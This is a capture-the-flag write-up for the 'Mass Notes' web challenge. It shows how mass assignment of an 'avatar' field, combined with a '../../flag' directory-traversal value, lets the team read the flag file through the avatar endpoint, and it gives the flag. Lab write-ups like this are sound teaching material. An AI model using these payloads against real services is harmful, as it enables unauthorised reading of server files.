Mass Notes
- Category: Web
- 250 Points
- Solved by the JCTF Team
Description
Solution
Following the supplied link, we arrive at a note publishing site.
Let's go ahead and try publishing a note.
Publishing a note results in a POST to https://mass-notes.chal.intentsummit.org/note
with a payload of
{"title":"note1","content":"nothing"}
after which the site redirects to a note.html page with our note info and some more stuff as query string parameters:
{"title":"note1","content":"nothing","avatar":"default_1.png","_id":"61920ccd33d4322c481ea80d","__v":0}
What happens if we POST a note using all of these parameters instead of just the title and content?
We get an error which seems to indicate the id has already been used.
Not a problem though, we'll just remove the id field, POST again... and we get a valid respons:
{
"title": "note1",
"content": "nothing",
"avatar": "default_1.png",
"_id": "6192149b33d4322c481ea81d",
"__v": 0
}
Now what happens if we change the avatar field to something else?
Trying default_2.png or default_3.png still results in a valid response:
{
"title": "note1",
"content": "nothing",
"avatar": "default_3.png",
"_id": "6192156e33d4322c481ea823",
"__v": 0
}
The note.html page we saw earlier shows us our note content along with an avatar image.
This avatar is retrieved by a GET request to https://mass-notes.chal.intentsummit.org/avatar/61920ccd33d4322c481ea80d.png
where the avatar file name is based on the id of our note with the added .png extension.
If we GET the avatar images for our custom notes, we get different avatar images!
Let's try setting a more interesting avatar...
We POST a note with the following payload:
{
"title": "note1",
"content": "nothing",
"avatar": "flag.png",
"__v": 0
}
When we GET the corresponding avatar image (using the returned id and adding .png extension), we find not an image but an error message:
Error: ENOENT: no such file or directory, open '/app/avatars/flag.png'
From here it's a matter of guessing the flag file name and adding some directory traversal...
We POST the following note:
{
"title": "note1",
"content": "nothing",
"avatar": "../../flag",
"__v": 0
}
and then we can simply GET our avatar-flag (again using the returned id and adding .png extension) which produces the flagINTENT{d0nt_mass_with_ap1s}